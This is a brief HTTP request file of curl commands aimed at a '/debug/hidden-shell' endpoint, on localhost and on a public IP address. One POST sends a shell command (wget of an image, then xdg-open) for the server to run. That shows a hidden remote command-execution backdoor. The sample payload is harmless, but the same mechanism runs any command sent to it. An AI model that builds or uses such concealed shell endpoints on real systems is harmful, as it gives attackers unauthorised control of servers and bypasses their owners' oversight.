
###
curl -X GET http://localhost:8080/debug/hidden-shell

###
curl -X GET http://158.160.74.150:8080/debug/hidden-shell

###
curl -X POST http://localhost:8080/debug/hidden-shell -d "wget -O red-fox.jpg https://maymont.org/wp-content/uploads/2020/04/banner-red-fox.jpg && xdg-open red-fox.jpg"
